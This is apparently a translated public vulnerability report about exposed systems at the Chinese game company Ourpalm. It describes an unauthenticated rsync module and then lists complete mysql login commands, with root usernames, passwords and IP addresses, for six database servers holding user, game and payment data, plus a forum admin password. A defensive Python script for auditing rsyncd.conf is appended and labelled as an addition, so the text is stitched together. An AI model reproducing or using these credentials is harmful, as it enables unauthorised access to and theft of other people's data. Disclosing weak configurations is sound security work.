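2013-11-20: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public.
2014-01-04: The vendor has actively ignored the vulnerability; details are disclosed to the public.
掌趣科技 (Ourpalm), stock code: 300315
Misconfigured systems at 掌趣科技 put a large amount of database data at risk of being dumped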
rsync 219.232.240.2::case
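The rsync module requires no authentication, which exposes its files. The following database credentials were found in those files. The database grants are not strict: any IP can connect with a valid username and password, and the accounts have very high privileges.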
掌趣科技

mysql -uroot -pmysql228 -h219.232.240.6
Databases: analyze, android, bbs, cjsh_user, cms, dx, football, game_stat, game_stat_test, gcenter, gs, lt_wap, mis, mysql, ourpalm, ssfee_platform, ssfee_platform_test, test, test_channel, union, union_test, user, user_tmp, webpay, yjws, yjws-bak

mysql -uroot -pmysql35 -h114.66.192.86
Databases: android, backup, db_sp_gw, db_zq_gw, echarge, mobilecharge, mysql, paycenter, paycenter0708, sms_coop, sms_coop2, sms_coop_cz, sms_coop_xjoys, ssfee_platform, stat_fee_xjoys, stat_spservice, stat_ssfee_logs, test, webpay, webreport, webtest

mysql -uroot -pmysql228 -h124.248.32.246
Databases: analyze, bbs, bbs_new, bbs_test, cjsh_user, game_stat, gcenter, mysql, ssfee_platform, test, union, user, user_tmp, webpay, yjws

mysql -ustoneage -pourp@lm -h117.79.132.166
Databases: nagdb, stoneage, stoneage_18

mysql -uwebgame -pmysql39 -h117.79.148.39
Databases: dedecmsv57utf8, dedecmsv57utf8sp1, game, gs0708, mysql, portal_0708, ultrax, user

mysql -uroot -pmysql242 -h219.232.244.242
Databases: bbs, cacti, derkhan, mysql, sanguo_vote, stat, test, webgame_center, webpay, webpay_test, xweibo

http://bbs.gamebean.com
admin:wanglirong
Consider replacing your network administrators; this is far too weak!
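A defensive check for the rsync misconfiguration described above, as an added example that is not part of the original report: this Python script parses an rsyncd.conf and flags modules that lack `auth users` or `hosts allow`. The sample configuration, its paths and the user name are constructed; only the module name `case` comes from the report.

```python
import re

# Constructed sample config (not from the report); only the module name
# "case" is taken from the rsync command shown in the report.
SAMPLE_CONF = """\
[case]
    path = /data/case

[backup]
    path = /data/backup
    auth users = backupuser
    secrets file = /etc/rsyncd.secrets
    hosts allow = 10.0.0.0/8
"""

# Parameters whose absence leaves a module open (names normalised as in _norm).
CHECKS = {"authusers": "no 'auth users': anonymous access allowed",
          "hostsallow": "no 'hosts allow': reachable from any address"}

def _norm(name):
    # rsync ignores case and whitespace in parameter names
    return re.sub(r"\s+", "", name).lower()

def parse_rsyncd_conf(text):
    """Return (global_params, {module: params}) parsed from rsyncd.conf text."""
    globals_, modules, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = modules.setdefault(m.group(1).strip(), {})
        elif "=" in line:
            key, value = line.split("=", 1)
            (globals_ if current is None else current)[_norm(key)] = value.strip()
    return globals_, modules

def audit(text):
    """Map each module to its findings; an empty list means nothing flagged."""
    globals_, modules = parse_rsyncd_conf(text)
    report = {}
    for name, params in modules.items():
        eff = {**globals_, **params}  # module settings override globals
        report[name] = [msg for key, msg in CHECKS.items() if not eff.get(key)]
    return report

if __name__ == "__main__":
    print(audit(SAMPLE_CONF))
```

The parser does not follow include directives or line continuations, so a configuration split across several files has to be concatenated before it is audited.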
Unable to contact the vendor, or the vendor actively refused.